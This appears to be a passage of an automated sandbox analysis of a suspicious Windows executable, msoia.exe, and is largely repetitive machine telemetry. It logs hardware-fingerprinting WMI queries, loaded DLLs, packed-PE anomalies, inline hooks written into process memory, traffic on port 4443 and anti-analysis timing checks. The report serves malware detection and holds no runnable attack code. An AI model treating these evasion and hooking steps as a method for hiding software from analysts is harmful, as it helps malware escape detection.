      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\msoia.exe "C:\Users\user\Desktop\msoia.exe"
      Source: C:\Users\user\Desktop\msoia.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\msoia.exeProcess created: C:\Windows\System32\cmd.exe cmd ver
      Source: C:\Users\user\Desktop\msoia.exeProcess created: C:\Windows\System32\cmd.exe cmd verJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeSection loaded: winmm.dllJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeSection loaded: sxs.dllJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeSection loaded: netapi32.dllJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeSection loaded: wkscli.dllJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeSection loaded: samcli.dllJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeSection loaded: samlib.dllJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeSection loaded: winbrand.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{76A64158-CB41-11D1-8B02-00600806D9B6}\InProcServer32Jump to behavior
      Source: msoia.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
      Source: msoia.exeStatic file information: File size 16498688 > 1048576
      Source: msoia.exeStatic PE information: Raw size of .bss3 is bigger than: 0x100000 < 0xfbae00
      Source: msoia.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
      Source: initial sampleStatic PE information: section where entry point is pointing to: .bss3
      Source: msoia.exeStatic PE information: section name: .bss0
      Source: msoia.exeStatic PE information: section name: .symtab
      Source: msoia.exeStatic PE information: section name: .bss1
      Source: msoia.exeStatic PE information: section name: .bss2
      Source: msoia.exeStatic PE information: section name: .bss3
      Source: C:\Users\user\Desktop\msoia.exeCode function: 0_3_000001CA8ED87940 push eax; ret 0_3_000001CA8ED87941
      Source: C:\Users\user\Desktop\msoia.exeCode function: 0_3_000001CA8ED87940 push eax; ret 0_3_000001CA8ED87941
      Source: C:\Users\user\Desktop\msoia.exeCode function: 0_3_000001CA8ED87940 push eax; ret 0_3_000001CA8ED87941
      Source: C:\Users\user\Desktop\msoia.exeCode function: 0_3_000001CA8ED87940 push eax; ret 0_3_000001CA8ED87941
      Source: C:\Users\user\Desktop\msoia.exeCode function: 0_3_000001CA8ED87940 push eax; ret 0_3_000001CA8ED87941
      Source: C:\Users\user\Desktop\msoia.exeCode function: 0_3_000001CA8ED87940 push eax; ret 0_3_000001CA8ED87941
      Source: C:\Users\user\Desktop\msoia.exeCode function: 0_3_000001CA8ED87940 push eax; ret 0_3_000001CA8ED87941
      Source: C:\Users\user\Desktop\msoia.exeCode function: 0_3_000001CA8ED79E8D pushad ; iretd 0_3_000001CA8ED79E8E
      Source: C:\Users\user\Desktop\msoia.exeCode function: 0_3_000001CA8ED79E8D pushad ; iretd 0_3_000001CA8ED79E8E
      Source: C:\Users\user\Desktop\msoia.exeCode function: 0_3_000001CA8ED85BBD pushad ; iretd 0_3_000001CA8ED85BBE
      Source: C:\Users\user\Desktop\msoia.exeCode function: 0_3_000001CA8ED85BBD pushad ; iretd 0_3_000001CA8ED85BBE
      Source: C:\Users\user\Desktop\msoia.exeCode function: 0_3_000001CA8ED85BBD pushad ; iretd 0_3_000001CA8ED85BBE
      Source: C:\Users\user\Desktop\msoia.exeCode function: 0_3_000001CA8ED85BBD pushad ; iretd 0_3_000001CA8ED85BBE
      Source: C:\Users\user\Desktop\msoia.exeCode function: 0_3_000001CA8ED85BBD pushad ; iretd 0_3_000001CA8ED85BBE
      Source: C:\Users\user\Desktop\msoia.exeCode function: 0_3_000001CA8ED85BBD pushad ; iretd 0_3_000001CA8ED85BBE
      Source: C:\Users\user\Desktop\msoia.exeCode function: 0_3_000001CA8ED85BBD pushad ; iretd 0_3_000001CA8ED85BBE
      Source: C:\Users\user\Desktop\msoia.exeCode function: 0_3_000001CA8ED87940 push eax; ret 0_3_000001CA8ED87941
      Source: C:\Users\user\Desktop\msoia.exeCode function: 0_3_000001CA8ED87940 push eax; ret 0_3_000001CA8ED87941
      Source: C:\Users\user\Desktop\msoia.exeCode function: 0_3_000001CA8ED87940 push eax; ret 0_3_000001CA8ED87941
      Source: C:\Users\user\Desktop\msoia.exeCode function: 0_3_000001CA8ED87940 push eax; ret 0_3_000001CA8ED87941
      Source: C:\Users\user\Desktop\msoia.exeCode function: 0_3_000001CA8ED87940 push eax; ret 0_3_000001CA8ED87941
      Source: C:\Users\user\Desktop\msoia.exeCode function: 0_3_000001CA8ED87940 push eax; ret 0_3_000001CA8ED87941
      Source: C:\Users\user\Desktop\msoia.exeCode function: 0_3_000001CA8ED87940 push eax; ret 0_3_000001CA8ED87941
      Source: C:\Users\user\Desktop\msoia.exeCode function: 0_3_000001CA8ED79E8D pushad ; iretd 0_3_000001CA8ED79E8E
      Source: C:\Users\user\Desktop\msoia.exeCode function: 0_3_000001CA8ED79E8D pushad ; iretd 0_3_000001CA8ED79E8E
      Source: C:\Users\user\Desktop\msoia.exeCode function: 0_3_000001CA8ED85BBD pushad ; iretd 0_3_000001CA8ED85BBE
      Source: C:\Users\user\Desktop\msoia.exeCode function: 0_3_000001CA8ED85BBD pushad ; iretd 0_3_000001CA8ED85BBE
      Source: C:\Users\user\Desktop\msoia.exeCode function: 0_3_000001CA8ED85BBD pushad ; iretd 0_3_000001CA8ED85BBE
      Source: C:\Users\user\Desktop\msoia.exeCode function: 0_3_000001CA8ED85BBD pushad ; iretd 0_3_000001CA8ED85BBE
      Source: C:\Users\user\Desktop\msoia.exeCode function: 0_3_000001CA8ED85BBD pushad ; iretd 0_3_000001CA8ED85BBE
      Source: C:\Users\user\Desktop\msoia.exeCode function: 0_3_000001CA8ED85BBD pushad ; iretd 0_3_000001CA8ED85BBE

      Hooking and other Techniques for Hiding and Protection

      barindex
      Source: C:\Users\user\Desktop\msoia.exeMemory written: PID: 7004 base: 7FFE22370008 value: E9 EB D9 E9 FF Jump to behavior
      Source: C:\Users\user\Desktop\msoia.exeMemory written: PID: 7004 base: 7FFE2220D9F0 value: E9 20 26 16 00 Jump to behavior
      Source: C:\Users\user\Desktop\msoia.exeMemory written: PID: 7004 base: 7FFE2238000D value: E9 BB CB EB FF Jump to behavior
      Source: C:\Users\user\Desktop\msoia.exeMemory written: PID: 7004 base: 7FFE2223CBC0 value: E9 5A 34 14 00 Jump to behavior
      Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 4443
      Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49730
      Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 4443
      Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49732
      Source: C:\Users\user\Desktop\msoia.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Source: C:\Users\user\Desktop\msoia.exeSpecial instruction interceptor: First address: 2CEC7EB instructions rdtsc caused by: RDTSC with Trap Flag (TF)
      Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
